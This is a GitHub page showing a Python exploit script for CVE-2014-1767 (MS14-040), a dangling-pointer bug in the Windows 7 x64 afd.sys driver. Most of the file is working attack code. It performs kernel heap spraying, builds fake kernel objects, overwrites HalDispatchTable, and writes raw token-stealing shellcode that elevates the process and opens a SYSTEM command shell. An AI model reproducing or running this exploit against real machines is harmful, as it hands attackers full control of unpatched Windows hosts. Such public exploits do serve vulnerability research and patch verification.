forked from Ascotbe/Kernelhub
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2014-1767_x64.py
346 lines (281 loc) · 13.9 KB
/
CVE-2014-1767_x64.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
# Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
# Date: 2016-03-03
# Exploit Author: Rick Larabee
# Vendor Homepage: www.microsoft.com
# Version: Windows 7, 64 bit
# Tested on: Win7 x64
# afd.sys - 6.1.7601.17514
# ntdll.dll - 6.1.7601.17514
#
# CVE : CVE-2014-1767
# Category: Local Privilege Escalation
# References:
# http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
# http://ricklarabee.blogspot.com/
# https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/
# https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
# http://www.cvedetails.com/cve/CVE-2014-1767/
# https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/
#
# Greetz: PWN4GEPWN1E, SecurityMook
from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x40
Zerobits = c_int(0)
RegionSize = c_ulonglong(0x1000)
written = c_ulonglong(0)
FakeObjSize = 0x100
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
INVALID_HANDLE_VALUE = -1
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
HalDispatchTable = c_uint64
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p, c_ulonglong, POINTER(c_ulonglong)]
ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong]
def find_driver_base(driver=None):
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
lpImageBase = (c_ulonglong * 1024)()
lpcbNeeded = c_longlong()
Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
else:
#if process_is_wow64():
# raise RuntimeError('python running in WOW64 is not supported')
lpImageBase = (c_ulong * 1024)()
lpcbNeeded = c_long()
driver_name_size = c_long()
driver_name_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
for base_addr in lpImageBase:
driver_name = c_char_p('\x00' * driver_name_size.value)
if base_addr:
Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
if driver == None and driver_name.value.lower().find("krnl") != -1:
return (base_addr, driver_name.value)
elif driver_name.value.lower() == driver:
return (base_addr, driver_name.value)
return None
def get_haldispatchtable():
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
kernel32.LoadLibraryExA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64
(krnlbase, kernelver) = find_driver_base()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable -= hKernel
halDispatchTable += krnlbase
return halDispatchTable
def CreateBuffer1(inbuf1addr):
print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr)
inbuf1size = 0x40
targetsize = 0x100
virtualAddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff)
inbuf1 = "\x41" * 0x20
inbuf1 += struct.pack("Q", virtualAddress) #0x1a
inbuf1 += struct.pack("Q", mdlsize)
inbuf1 += "\x42" * 4
inbuf1 += "\x43" * 4
inbuf1 += "\x01\x00\x00\x00"
inbuf1 += "\x00\x00\x00\x00"
inbuf1 += "\x00" * (inbuf1size - len(inbuf1))
baseadd = c_ulonglong(0x1001)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written))
def CreateBuffer2(inbuf2addr):
print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr)
inbuf2size = 0x18
addrforbuf2 = 0x0AAAAAAA
inbuf2 = struct.pack("Q", 0x1)
inbuf2 += struct.pack("Q", addrforbuf2)
inbuf2 += "\x00" * (inbuf2size -len(inbuf2))
baseadd = c_ulonglong(inbuf2addr+1)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))
def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory):
print "[+] Print creating fakeobject at ", hex(fakeobjectaddr)
fakeobject2addr = setinfoworkerfactory - 0x18
fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite)
fakeobj2size = len(fakeobject2)
kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))
objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
fakeobject = objhead
fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96
fakeobject += "\x42" * (FakeObjSize - len(fakeobject))
kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written))
def main():
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
print "[-] no luck creating socket!"
sys.exit(1)
print "[+] got sock 0x%x" % sock
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))
print "[+] sock connected."
print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x02aaaaaa
while(1):
hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)
if hrgn == 0:
break
rgnarr.append(hrgn)
print ".",
print "\n[+] GO!"
HalDispatchTable = get_haldispatchtable()
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
# Win7 - x64
(halbase, dllname) = find_driver_base("hal.dll")
OS = "7"
if OS == "7":
HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
_KPROCESS = "\x70"
_TOKEN = "\x08\x02"
_UPID = "\x80\x01"
_APLINKS = "\x88\x01"
print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation)
IoStatus = c_ulonglong()
IoStatusBlock = c_ulonglong()
addrSetInfoWorkerFactory = 0x2218
firstWriteAddr = HalDispatchTable + 0x8 - 0x2C
secondWriteAddr = firstWriteAddr + 0x4
thirdWriteAddr = firstWriteAddr + 0x1
shellcode_address = c_ulonglong
shellcode_address = 0x0000000000002500
what_address = 0x0000250800002500
what_part1 = what_address & 0xfffffff
what_part2 = what_address >> 32 & 0xfffffff
inbuf1 = 0x1000
inbuf2 = 0x2000
hWF = c_ulonglong(0)
FakeWorkerFactoryADDR = 0x2100
CreateBuffer1(inbuf1)
CreateBuffer2(inbuf2)
CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory)
print ""
print ""
print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory "
print "[*] structures for phase 2 and fil the freed space with a "
print "[*] WorkerFactory Object"
raw_input("[+] Press Enter to trigger phase 1")
ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong),
c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0)
kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong]
CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0))
ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0)
hWFaddr = hWF
padding = "\x90"*8
HalDispatchTable0x8 = HalDispatchTable + 0x8
sc_pointer = struct.pack("Q", shellcode_address+0x10)
sc_pointer += struct.pack("Q", 0x25)
restore_ptrs = "\x41\x51" +\
"\x41\x52" +\
"\x41\x53" +\
"\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation) +\
"\x49\xba" + struct.pack("Q", HalDispatchTable0x8) +\
"\x4d\x89\x0a"
tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" +\
"\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\
"\x4D\x89\xCA" +\
"\x4D\x8B\x89" + _APLINKS + "\x00\x00" +\
"\x49\x81\xE9" + _APLINKS + "\x00\x00" +\
"\x49\x83\xB9" + _UPID + "\x00\x00\x04" +\
"\x75\xe8" +\
"\x4D\x8B\x89" + _TOKEN + "\x00\x00" +\
"\x4D\x89\x8A" + _TOKEN + "\x00\x00"
fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" +\
"\x4d\x89\xd1" +\
"\x4d\x8b\x12" +\
"\x41\xbb" + struct.pack("L", hWF.value)+\
"\x41\x83\xe3\xfc" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xda" +\
"\x49\xc7\x02\x00\x00\x00\x00" +\
"\x49\x83\xc1\x58" +\
"\x4d\x89\xca" +\
"\x4d\x8b\x09" +\
"\x49\x83\xe9\x01" +\
"\x4d\x89\x0a" +\
"\x41\x5b" +\
"\x41\x5A" +\
"\x41\x59" +\
"\xc3"
shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders
shellcode_size = len(shellcode)
print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address)
kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written))
print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the"
print "[*] WorkerFactory object created above and fill the freed object"
print "[*] with a user controlled object to perform the necessary overwrites"
raw_input("[+] Press Enter to trigger phase 2")
### Trigger 2
## afd!AfdTransmitPackets
ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0)
ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False)
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ;
inp = c_long()
out = c_long()
inp = 0x1337
qip = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /K cd c:\\windows\\system32")
if __name__ == "__main__":
if platform.architecture()[0] == '64bit':
main()
else:
print "Please use a 64 bit version of python"
sys.exit()